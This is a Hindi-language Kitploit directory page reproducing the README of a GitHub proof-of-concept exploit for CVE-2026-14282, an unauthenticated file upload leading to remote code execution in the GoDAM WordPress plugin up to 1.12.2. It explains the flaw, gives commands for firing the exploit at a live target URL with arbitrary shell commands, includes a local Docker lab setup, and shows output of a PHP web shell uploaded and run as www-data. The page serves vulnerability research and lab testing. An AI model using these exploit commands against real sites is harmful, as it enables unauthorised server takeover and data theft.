Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-14282 — GoDAM WordPress प्लगइन <= 1.12.2 बिना प्रमाणीकरण के फ़ाइल अपलोड RCE (CVE-2026-14282) | Kitploit
उपकरण/GitHubGitHub/nullwhisper/cve-2026-14282
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलैब और अभ्यास
GitHubnullwhisper/cve-2026-14282

CVE-2026-14282

GoDAM WordPress प्लगइन <= 1.12.2 बिना प्रमाणीकरण के फ़ाइल अपलोड RCE (CVE-2026-14282)

रिपॉजिटरी देखें
1228 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-14282 — GoDAM WordPress प्लगइन <= 1.12.2 बिना प्रमाणीकरण के फ़ाइल अपलोड -> RCE

लेखक: nullwhisper
उपयोग: केवल अधिकृत सुरक्षा अनुसंधान / भेद्यता सत्यापन हेतु।

यह क्या है?

GoDAM WordPress प्लगइन संस्करण <= 1.12.2 में एक WPForms फ़ील्ड godam_record पंजीकृत होती है। अपलोड हैंडलर save_video_file() सार्वजनिक wpforms_process_before_filter एक्शन से जुड़ा होता है, इसलिए यह किसी भी प्रमाणीकरण जाँच से पहले चलता है। हैंडलर हमलावर-नियंत्रित Content-Type हेडर पर भरोसा करता है, जब तक MIME प्रकार video/ से शुरू होता है तब तक PHP फ़ाइल स्वीकार करता है, और उसे वेब पर उपलब्ध निर्देशिका wp-content/uploads/godam/wpforms/ में ले जाता है। यह एक बिना प्रमाणीकरण वाले हमलावर को मनमाना PHP कोड अपलोड और निष्पादित करने की अनुमति देता है।

  • CVE: CVE-2026-14282
  • उत्पाद: GoDAM WordPress प्लगइन
  • प्रभावित: <= 1.12.2
  • हल: 2.0.0
  • प्रकार: RCE की ओर ले जाने वाला बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड
  • CVSS: 9.8 (गंभीर)
  • संदर्भ

    • IONIX एडवाइजरी: https://www.ionix.io/threat-center/cve-2026-14282/
    • CVE रिकॉर्ड: https://www.cve.org/CVERecord?id=CVE-2026-14282
    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14282
    • WordPress.org प्लगइन पेज: https://wordpress.org/plugins/godam/

    फ़ाइलें

    root@kitploit:~
    .
    ├── cve_2026_14282_poc.py   # Main PoC
    ├── lab/
    │   ├── docker-compose.yml  # WordPress lab
    │   └── setup.php           # Creates a WPForms form with GoDAM field
    ├── requirements.txt
    └── README.md
    

    इंस्टॉल

    root@kitploit:~
    pip3 install -r requirements.txt
    

    उपयोग

    लाइव टार्गेट

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u https://target.com/page-with-form
    

    स्क्रिप्ट WPForms फ़ॉर्म ID और GoDAM फ़ील्ड ID का स्वतः पता लगाती है। यदि पेज में कई फ़ॉर्म हों या पहचान विफल हो, तो उपयोग करें:

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
        --form-id 4 --field-id 1 --cmd "whoami"
    

    स्थानीय लैब

    1. कमजोर प्लगइन डाउनलोड करें (बाइनरी को पुनर्वितरित न करें):

      root@kitploit:~
      mkdir -p lab/wpforms-lite lab/godam
      cd lab/wpforms-lite
      wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
      unzip wpforms-lite.latest-stable.zip
      rm wpforms-lite.latest-stable.zip
      cd ../godam
      wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
      unzip godam.1.12.2.zip
      rm godam.1.12.2.zip
      cd ../..
      
    2. लैब शुरू करें:

      root@kitploit:~
      cd lab
      docker compose up -d
      
    3. WordPress इंस्टॉलर को http://127.0.0.1:8092 पर पूरा करें।

    4. प्लगइन इंस्टॉल और सक्रिय करें, फिर फ़ॉर्म और टेस्ट पेज बनाएँ:

      root@kitploit:~
      docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
      docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
      docker exec -i lab-wpcli-1 php /tmp/setup.php
      
    5. PoC चलाएँ:

      root@kitploit:~
      python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
      

    लोकलहोस्ट पर सत्यापित

    WordPress 6.8 + WPForms Lite नवीनतम + GoDAM 1.12.2 पर परीक्षण किया गया।

    root@kitploit:~
    [*] Detecting WPForms form and GoDAM field...
    [*] Found form ID 4, GoDAM field(s): 1
    [*] Trying upload via field 1...
    [+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
    [+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
    [*] Command output:
    GODAM-RCE-Linux ... PWNED
    

    प्लगइन बाइनरी क्यों शामिल नहीं हैं

    इस रिपॉजिटरी में केवल PoC और लैब ऑर्केस्ट्रेशन फ़ाइलें हैं। कमजोर प्लगइन बाइनरी को ब्लोट और वितरण संबंधी समस्याओं से बचने के लिए बाहर रखा गया है। अपनी खुद की लैब के लिए WordPress.org से विशिष्ट कमजोर संस्करण डाउनलोड करें।

    अस्वीकरण

    यह टूल केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान के लिए है। इसे उन सिस्टम पर उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है। लेखक इस कोड के दुरुपयोग या क्षति के लिए उत्तरदायी नहीं है।

    टूल डाउनलोड करें